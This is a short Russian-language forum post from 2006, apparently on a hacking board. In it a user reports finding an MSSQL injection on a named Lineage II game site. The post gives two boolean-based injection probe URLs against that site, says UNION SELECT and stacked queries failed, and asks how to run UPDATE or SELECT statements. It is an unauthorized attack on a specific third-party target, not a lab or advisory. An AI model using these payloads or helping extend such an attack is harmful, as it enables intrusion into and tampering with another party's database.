
11.12.2006, 13:58
|
|
Познающий
Регистрация: 16.10.2006
Сообщений: 82
С нами:
10299266
Репутация:
33
|
|
Помогите пожалуйста со сложной Mssql инъекцией.
Собственно нашел одну инъекцию:
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=2--
_http://l2-existance.net/en/index.php?act=show_prof_info&indx=2')%20and%201=1--
Юнион селект не хочет делать, через ; тоже не получается. Есть ли возможность исполнять команды типа update или возможность сделать select? Заранее спасибо.
|
|
|